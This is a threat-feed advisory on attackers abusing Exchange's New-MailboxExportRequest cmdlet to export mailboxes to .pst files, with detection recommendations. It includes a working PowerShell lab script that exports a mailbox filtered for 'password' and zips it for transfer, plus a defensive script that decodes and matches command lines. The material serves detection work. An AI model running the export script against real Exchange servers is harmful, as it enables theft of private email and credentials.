Threat Feed
medium advisory

Exchange Mailbox Export via PowerShell

Adversaries may use the New-MailboxExportRequest PowerShell cmdlet to export mailboxes in Exchange, potentially leading to sensitive information theft.

Attackers may target user email to collect sensitive information. The New-MailboxExportRequest cmdlet exports the contents of a primary mailbox or personal archive to a .pst file. The export runs per mailbox and is asynchronous: the cmdlet queues a request that the Mailbox Replication Service processes, and the .pst is written to a UNC path that the Exchange Trusted Subsystem group must be able to write to. The cmdlet exists only in on-premises Exchange Server (it is not available in Exchange Online) and is gated by the "Mailbox Import Export" management role, which no role group holds by default, not even Organization Management; an account can only run it if someone assigned that role or the attacker assigned it to themselves. Attackers abuse the cmdlet to stage mailbox contents for exfiltration, and those contents are likely to contain sensitive and strategic data. The activity is typically performed from PowerShell and is easy to miss without specific monitoring, in part because a process-creation event for the Exchange Management Shell records only the shell launching, not the cmdlets typed into it. The export may be one stage of a larger campaign targeting sensitive information.

Attack Chain

  1. An attacker gains initial access to a host from which Exchange PowerShell is reachable, using an account that holds the "Mailbox Import Export" management role (or can grant it to itself).
  2. The attacker opens an Exchange PowerShell session, either the Exchange Management Shell on the server or a remote PowerShell session to the server's /PowerShell virtual directory.
  3. The attacker runs New-MailboxExportRequest to queue the export of a target mailbox to a .pst file on a UNC share. The command may include a -ContentFilter expression to export only messages matching a query, such as mail mentioning passwords or a project name.
  4. The Exchange server processes the request asynchronously and writes a .pst file containing the mailbox data to the designated path.
  5. The attacker retrieves the exported .pst file from that path.
  6. The attacker may compress and archive the .pst file to reduce its size for exfiltration.
  7. The attacker exfiltrates the .pst file to an external location under their control.
  8. The attacker analyzes the .pst file to extract sensitive information such as credentials, financial data, or intellectual property.
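The following script is an added example, not part of the original advisory, that reproduces steps 2 through 6 of the chain in a lab so the telemetry described later on this page can be generated and checked. The server name exlab01.corp.example, the mailbox jdoe, the share \\EXLAB01\PSTExport and the request name are hypothetical; it assumes the Exchange Trusted Subsystem group can write to the share and that the running account holds the "Mailbox Import Export" role.

```powershell
# Added lab reproduction of the attack chain (not the advisory's own code).
# Assumed/hypothetical: server exlab01.corp.example, mailbox 'jdoe',
# share \\EXLAB01\PSTExport writable by Exchange Trusted Subsystem, and an
# account holding the "Mailbox Import Export" management role.

# Step 2: remote PowerShell session to the Exchange server (implicit remoting).
$Session = New-PSSession -ConfigurationName Microsoft.Exchange `
    -ConnectionUri 'http://exlab01.corp.example/PowerShell/' -Authentication Kerberos
Import-PSSession $Session -DisableNameChecking | Out-Null

# Step 3: queue the export. -ContentFilter is an OPATH expression; here it
# narrows the export to messages whose body or subject mentions "password".
$Request = New-MailboxExportRequest -Mailbox 'jdoe' -Name 'lab-export-jdoe' `
    -ContentFilter { (Body -like '*password*') -or (Subject -like '*password*') } `
    -FilePath '\\EXLAB01\PSTExport\jdoe.pst'

# Step 4: the Mailbox Replication Service processes the request in the
# background; poll the request object until it leaves the active states.
do {
    Start-Sleep -Seconds 15
    $Status = (Get-MailboxExportRequest -Identity $Request.Identity).Status
} while ($Status -in 'Queued', 'InProgress')
Write-Host "Export finished with status: $Status"

# Steps 5-6: collect the .pst from the share and compress it for transfer.
Compress-Archive -Path '\\EXLAB01\PSTExport\jdoe.pst' `
    -DestinationPath "$env:TEMP\jdoe.zip" -Force

# What the Exchange side recorded: the admin audit log (on by default in
# Exchange 2013 and later) keeps the cmdlet, caller and parameters no matter
# which host the cmdlet was typed on, so it sees this even when no
# process-creation event contains the cmdlet name.
Search-AdminAuditLog -Cmdlets New-MailboxExportRequest -StartDate (Get-Date).AddHours(-1) |
    Select-Object RunDate, Caller, ObjectModified,
        @{ Name = 'Parameters'; Expression = { $_.CmdletParameters -join '; ' } }

# Remove the completed request object (Exchange otherwise keeps it for 30 days).
Remove-MailboxExportRequest -Identity $Request.Identity -Confirm:$false
Remove-PSSession $Session
```

Run it from a workstation with the Exchange management tools or plain Windows PowerShell; the implicit-remoting session provides the mailbox cmdlets. The Search-AdminAuditLog call at the end is the quickest way to confirm what a defender would have had available after the fact.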

Impact

Successful abuse of the cmdlet gives the attacker the full contents of the exported mailboxes. This can lead to financial loss, reputational damage, or compromise of intellectual property. Because a single account holding the "Mailbox Import Export" role can export any mailbox in the organization, the scope is bounded only by how many requests the attacker submits, and a large number of users may be affected. The impact is significant because email often contains highly sensitive business communications and data.

Recommendation

  • Enable Sysmon process-creation logging (Event ID 1) so that PowerShell launches are recorded with their full command lines (Data Source: Sysmon).
  • Implement the provided Sigma rules to flag New-MailboxExportRequest, and -ContentFilter used with mailbox cmdlets, in process command lines. They fire only when the cmdlet appears on the command line (for example via -Command or -EncodedCommand); cmdlets typed into an already running Exchange Management Shell never appear in a process-creation event.
  • Cover interactive and remote sessions as well: enable PowerShell Script Block Logging (Event ID 4104) and review the Exchange admin audit log (Search-AdminAuditLog -Cmdlets New-MailboxExportRequest), which is enabled by default in Exchange 2013 and later and records the cmdlet, caller and parameters regardless of the host they were run from.
  • Review who holds the "Mailbox Import Export" management role (Get-ManagementRoleAssignment -Role "Mailbox Import Export") and remove assignments that are not required; no role group holds it by default, so every assignment should be explainable.
  • Monitor Windows Security Event Logs for PowerShell activity related to mailbox export requests; Event ID 4688 only carries the command line if the "Include command line in process creation events" policy is enabled (Data Source: Windows Security Event Logs).
  • Investigate any alerts generated by the Sigma rules. Export requests you did not schedule, listed by Get-MailboxExportRequest, are corroborating evidence, as are .pst files appearing on shares writable by the Exchange Trusted Subsystem.
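The script below is an added example, not the vendor's Sigma rule, that implements the matching logic of the two detections on this page against constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 fields (Image, User, CommandLine). It decodes -EncodedCommand launches before matching, and includes a benign Exchange Management Shell launch to show the gap the recommendations above point at. All sample events, user names and paths are constructed for the example.

```powershell
# Added detection example (not the platform's Sigma rule). Runs offline in
# Windows PowerShell 5.1 or PowerShell 7 on constructed sample events.

function Expand-EncodedCommand {
    # Append the decoded payload of -EncodedCommand / -enc / -ec / -e so that
    # base64-wrapped launches are matched on their real content.
    param([string]$CommandLine)
    $m = [regex]::Match($CommandLine, '(?i)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})')
    if (-not $m.Success) { return $CommandLine }
    try {
        $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
        return "$CommandLine`n[decoded] $decoded"
    } catch { return $CommandLine }   # not valid base64/UTF-16; match the raw line
}

function Test-MailboxExportEvent {
    # Mirrors the two rules: (1) New-MailboxExportRequest on the command line,
    # (2) -ContentFilter used together with a *-Mailbox* cmdlet.
    param([hashtable]$Event)
    $cl   = Expand-EncodedCommand $Event.CommandLine
    $hits = @()
    if ($cl -match 'New-MailboxExportRequest') { $hits += 'MailboxExport' }
    if ($cl -match '-ContentFilter\b' -and $cl -match '\b(?:New|Get|Set|Search|Remove)-Mailbox\w*') {
        $hits += 'ContentFilter'
    }
    [pscustomobject]@{ User = $Event.User; Image = $Event.Image; Hits = $hits; CommandLine = $cl }
}

# --- Constructed sample events (hypothetical users, hosts and paths) ---------
$PS = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$ExportWithFilter = "New-MailboxExportRequest -Mailbox 'jdoe' -ContentFilter {(Body -like '*password*')} " +
                    "-FilePath '\\EXLAB01\PSTExport\jdoe.pst'"
$Samples = @(
    # 1. Direct export via -Command: both rules see the cmdlet name.
    @{ User = 'CORP\svc-backup'; Image = $PS
       CommandLine = "powershell.exe -NoProfile -Command `"Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; " +
                     "New-MailboxExportRequest -Mailbox ceo -FilePath \\EXLAB01\PSTExport\ceo.pst`"" }
    # 2. Same thing hidden behind -EncodedCommand; only visible after decoding.
    @{ User = 'CORP\webadmin'; Image = $PS
       CommandLine = 'powershell.exe -NoP -W Hidden -EncodedCommand ' +
                     [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($ExportWithFilter)) }
    # 3. Interactive Exchange Management Shell launch. Whatever is typed into
    #    it afterwards never appears in a process-creation event, so this
    #    yields no hit; Script Block Logging or the admin audit log is needed.
    @{ User = 'CORP\exadmin'; Image = $PS
       CommandLine = "powershell.exe -noexit -command `". 'C:\Program Files\Microsoft\Exchange Server\V15\bin\RemoteExchange.ps1'; " +
                     "Connect-ExchangeServer -auto -ClientApplication:ManagementShell`"" }
)

$Samples | ForEach-Object { Test-MailboxExportEvent $_ } |
    Where-Object { $_.Hits.Count -gt 0 } |
    Format-List User, Hits, CommandLine
```

Expected behaviour: sample 1 matches MailboxExport, sample 2 matches both MailboxExport and ContentFilter once decoded, and sample 3 matches nothing even though it is exactly how an operator (or attacker) would start an interactive session. That third case is why the process-creation rules need the script block log or Search-AdminAuditLog beside them.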

Detection coverage 2

Detect Exchange Mailbox Export via PowerShell

medium

Detects the use of New-MailboxExportRequest cmdlet in PowerShell to export mailboxes.

Format: sigma · Tactics: collection, execution · Techniques: T1059.001, T1114 · Sources: process_creation, windows

Detect Exchange Mailbox Content Filter in PowerShell

medium

Detects the use of ContentFilter parameter with Mailbox cmdlets in PowerShell.

Format: sigma · Tactics: collection, execution · Techniques: T1059.001, T1114 · Sources: process_creation, windows

Detection queries are kept inside the platform and are not reproduced on this page.